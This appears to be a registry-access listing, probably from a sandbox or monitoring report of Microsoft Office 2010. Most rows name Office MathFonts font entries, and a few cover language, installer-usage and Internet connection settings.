HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@SimHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@SimSun
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
@SimSun-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Agency FB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Aharoni
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Algerian
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Andalus
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Angsana New
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
AngsanaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Aparajita
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arabic Typesetting
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arial
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arial Black
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arial Narrow
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arial Rounded MT Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Arial Unicode MS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Baskerville Old Face
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Batang
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
BatangChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bauhaus 93
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bell MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Berlin Sans FB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Berlin Sans FB Demi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bernard MT Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Blackadder ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bodoni MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bodoni MT Black
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bodoni MT Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bodoni MT Poster Compressed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Book Antiqua
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bookman Old Style
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bookshelf Symbol 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Bradley Hand ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Britannic Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Broadway
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Browallia New
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
BrowalliaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Brush Script MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Calibri
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Calibri Light
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Californian FB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Calisto MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Cambria
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Cambria Math
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Candara
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Castellar
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Centaur
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Century
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Century Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Century Schoolbook
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Chiller
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Colonna MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Comic Sans MS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Consolas
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Constantia
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Cooper Black
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Copperplate Gothic Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Copperplate Gothic Light
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Corbel
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Cordia New
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
CordiaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Courier New
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Curlz MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
DaunPenh
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
David
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
DFKai-SB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
DilleniaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
DokChampa
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Dotum
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
DotumChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Ebrima
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Edwardian Script ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Elephant
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Engravers MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Eras Bold ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Eras Demi ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Eras Light ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Eras Medium ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Estrangelo Edessa
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
EucrosiaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Euphemia
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
FangSong
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Felix Titling
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Footlight MT Light
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Forte
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Book
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Demi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Demi Cond
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Heavy
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Medium
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Franklin Gothic Medium Cond
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
FrankRuehl
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
FreesiaUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Freestyle Script
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
French Script MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gabriola
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Garamond
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gautami
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Georgia
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gigi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gill Sans MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gill Sans MT Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gill Sans MT Ext Condensed Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gill Sans Ultra Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gill Sans Ultra Bold Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gisha
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gloucester MT Extra Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Goudy Old Style
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Goudy Stout
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gulim
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
GulimChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Gungsuh
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
GungsuhChe
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Haettenschweiler
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Harlow Solid Italic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Harrington
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
High Tower Text
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Impact
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Imprint MT Shadow
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Informal Roman
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
IrisUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Iskoola Pota
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
JasmineUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Jokerman
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Juice ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
KaiTi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Kalinga
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Kartika
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Khmer UI
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
KodchiangUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Kokila
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Kristen ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Kunstler Script
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lao UI
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Latha
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Leelawadee
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Levenim MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
LilyUPC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Bright
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Calligraphy
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Console
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Fax
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Handwriting
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Sans
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Sans Typewriter
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Lucida Sans Unicode
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Magneto
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Maiandra GD
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Malgun Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Mangal
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Marlett
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Matura MT Script Capitals
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Meiryo
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Meiryo UI
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft Himalaya
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft JhengHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft New Tai Lue
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft PhagsPa
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft Sans Serif
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft Tai Le
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft Uighur
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft YaHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Microsoft Yi Baiti
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MingLiU
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MingLiU_HKSCS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MingLiU_HKSCS-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MingLiU-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Miriam
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Miriam Fixed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Mistral
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Modern No. 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Mongolian Baiti
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Monotype Corsiva
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MoolBoran
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS Mincho
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS Outlook
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS PGothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS PMincho
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS Reference Sans Serif
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS Reference Specialty
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MS UI Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MT Extra
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
MV Boli
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Narkisim
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Niagara Engraved
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Niagara Solid
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
NSimSun
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Nyala
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
OCR A Extended
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Old English Text MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Onyx
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Palace Script MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Palatino Linotype
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Papyrus
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Parchment
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Perpetua
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Perpetua Titling MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Plantagenet Cherokee
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Playbill
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
PMingLiU
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
PMingLiU-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Poor Richard
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Pristina
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Raavi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Rage Italic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Ravie
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Rockwell
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Rockwell Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Rockwell Extra Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Rod
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Sakkal Majalla
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Script MT Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe Print
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe Script
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe UI
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe UI Light
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe UI Semibold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Segoe UI Symbol
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Shonar Bangla
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Showcard Gothic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Shruti
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
SimHei
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Simplified Arabic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Simplified Arabic Fixed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
SimSun
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
SimSun-ExtB
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Snap ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Stencil
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Sylfaen
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Symbol
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tahoma
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tempus Sans ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Times New Roman
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Traditional Arabic
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Trebuchet MS
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tunga
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tw Cen MT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tw Cen MT Condensed
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Tw Cen MT Condensed Extra Bold
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Utsaah
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Vani
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Verdana
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Vijaya
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Viner Hand ITC
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Vivaldi
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Vladimir Script
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Vrinda
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Webdings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Wide Latin
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Wingdings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Wingdings 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
|
Wingdings 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
WORDFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
